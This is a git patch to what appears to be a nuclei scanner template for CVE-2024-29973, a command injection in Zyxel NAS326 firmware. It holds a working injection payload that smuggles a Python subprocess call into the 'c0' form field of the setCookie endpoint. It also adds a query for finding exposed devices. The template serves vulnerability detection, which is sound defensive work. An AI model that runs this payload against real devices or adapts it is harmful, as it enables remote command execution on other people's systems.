From 115e416027146631ed14031e858907f9cdca73fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 19 Jun 2024 18:41:25 +0530 Subject: [PATCH] verified poc --- http/cves/2024/CVE-2024-29973.yaml | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index e8cc240bc7..94e18cbc27 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29973 info: - name: Zyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection + name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection author: ritikchaddha severity: critical description: | @@ -19,16 +19,27 @@ info: epss-percentile: 0.9971 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: zyxel product: nas326_firmware - tags: cve,cve2024,zyxel,rce + fofa-query: app="ZYXEL-NAS326" + tags: cve,cve2024,zyxel,rce,intrusive +variables: + string: "{{randstr}}" http: - raw: - | - GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 + POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei + + ------WebKitFormBoundarygcflwtei + Content-Disposition: form-data; name="c0" + + storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)# + ------WebKitFormBoundarygcflwtei-- matchers: - type: dsl @@ -36,5 +47,5 @@ http: - "status_code == 200" - "contains(body, 'errmsg0\": \"OK')" - "contains(header, 'application/json')" - - regex('uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)', body) + - "contains(body, '{{string}}')" condition: and